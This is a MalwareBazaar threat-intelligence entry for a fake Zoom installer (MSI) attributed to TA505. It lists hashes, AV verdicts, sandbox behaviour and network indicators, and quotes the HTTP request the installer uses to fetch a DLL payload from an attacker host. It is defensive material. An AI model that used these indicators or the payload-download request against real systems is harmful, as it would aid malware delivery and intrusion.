MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments

SHA256 hash: e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c
SHA3-384 hash: 0bccf4733a38892b6b1ff54aad6374bf143695d753895a24cae9b0900ce4729bcf4fd9356d4ab27e6f1004cf774bdc79
SHA1 hash: 369006350f6b4c43c7f51a90deb5e73a20156b55
MD5 hash: c4e9e9a06001c6197de2ea2fec3d2214
humanhash: queen-alanine-two-seventeen
File name:ZoomSetup_26b30163.msi
Download: download sample
File size:11'544'064 bytes
First seen:2023-01-23 08:33:17 UTC
Last seen:Never
File type:Microsoft Software Installer (MSI) msi
MIME type:application/x-msi
ssdeep 196608:6e9dQDU9N3glGcBo/6xDD7yLEY2sNd0nOn1q1eUD9p8b3lWG7uCMkCA:N8g91gGcBD7yLfmz1rGYG6CMi
Threatray 6 similar samples on MalwareBazaar
TLSH T193C62223328E8336E6BE41359579D72AA1BABEE207B140CF53D0091F4E785C15A7EF52
TrID 80.0% (.MSI) Microsoft Windows Installer (454500/1/170)
10.7% (.MST) Windows SDK Setup Transform script (61000/1/5)
7.8% (.MSP) Windows Installer Patch (44509/10/5)
1.4% (.) Generic OLE2 / Multistream Compound (8000/1)
Reporter abuse_ch
Tags:msi TA505


Avatar
abuse_ch
GET /download.php?f=Ldrp.dll&from=ZoomSetup_26b30163.msi HTTP/1.1
Host: download-cdn.com
Connection: Keep-Alive

Intelligence


File Origin
# of uploads :
1
# of downloads :
116
Origin country :
CH CH
Vendor Threat Intelligence
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
anti-vm evasive fingerprint msiexec.exe shell32.dll
Result
Threat name:
Unknown
Detection:
malicious
Classification:
bank.troj.evad
Score:
100 / 100
Signature
Antivirus detection for URL or domain
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Powershell drops PE file
Sigma detected: Execute DLL with spoofed extension
System process connects to network (likely due to code injection or exploit)
Yara detected MalDoc
Behaviour
Behavior Graph:
behaviorgraph top1 signatures2 2 Behavior Graph ID: 787624 Sample: AnydeskSetup_26b30163.msi Startdate: 19/01/2023 Architecture: WINDOWS Score: 100 55 Multi AV Scanner detection for domain / URL 2->55 57 Antivirus detection for URL or domain 2->57 59 Malicious encrypted Powershell command line found 2->59 61 3 other signatures 2->61 7 powershell.exe 23 20 2->7         started        12 msiexec.exe 15 35 2->12         started        14 rundll32.exe 2->14         started        16 2 other processes 2->16 process3 dnsIp4 45 download-cdn.com 152.89.196.75, 443, 49695, 49696 NEXTVISIONGB United Kingdom 7->45 35 C:\ProgramData\435f8fae.dat, PE32 7->35 dropped 63 Powershell drops PE file 7->63 18 rundll32.exe 7->18         started        20 conhost.exe 7->20         started        37 C:\Windows\Installer\MSI5344.tmp, PE32+ 12->37 dropped 39 C:\Windows\Installer\4641a8.msi, Composite 12->39 dropped 41 C:\Windows\Installer\MSI4B9F.tmp, PE32 12->41 dropped 43 4 other files (none is malicious) 12->43 dropped 65 Malicious encrypted Powershell command line found 12->65 67 Drops executables to the windows directory (C:\Windows) and starts them 12->67 22 msiexec.exe 12->22         started        24 MSI5344.tmp 12->24         started        26 rundll32.exe 14->26         started        29 rundll32.exe 16->29         started        file5 signatures6 process7 signatures8 31 rundll32.exe 4 6 18->31         started        69 System process connects to network (likely due to code injection or exploit) 26->69 process9 dnsIp10 47 64.190.113.123, 443, 49697, 49698 TRAVELCLICKCORP1US United States 31->47 49 download-cdn.com 31->49 51 System process connects to network (likely due to code injection or exploit) 31->51 53 Deletes itself after installation 31->53 signatures11
Threat name:
Win32.Trojan.Tnega
Status:
Malicious
First seen:
2022-12-01 16:48:57 UTC
File Type:
Binary (Archive)
Extracted files:
84
AV detection:
9 of 39 (23.08%)
Threat level:
  5/5
Result
Malware family:
Score:
  10/10
Tags:
family:ta505
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Drops file in Windows directory
Drops file in System32 directory
Enumerates connected drives
Deletes itself
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
TA505
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:suspicious_msi_file
Author:Johnk3r
Description:Detects common strings, DLL and API in Banker_BR

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Microsoft Software Installer (MSI) msi e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c

(this sample)

Comments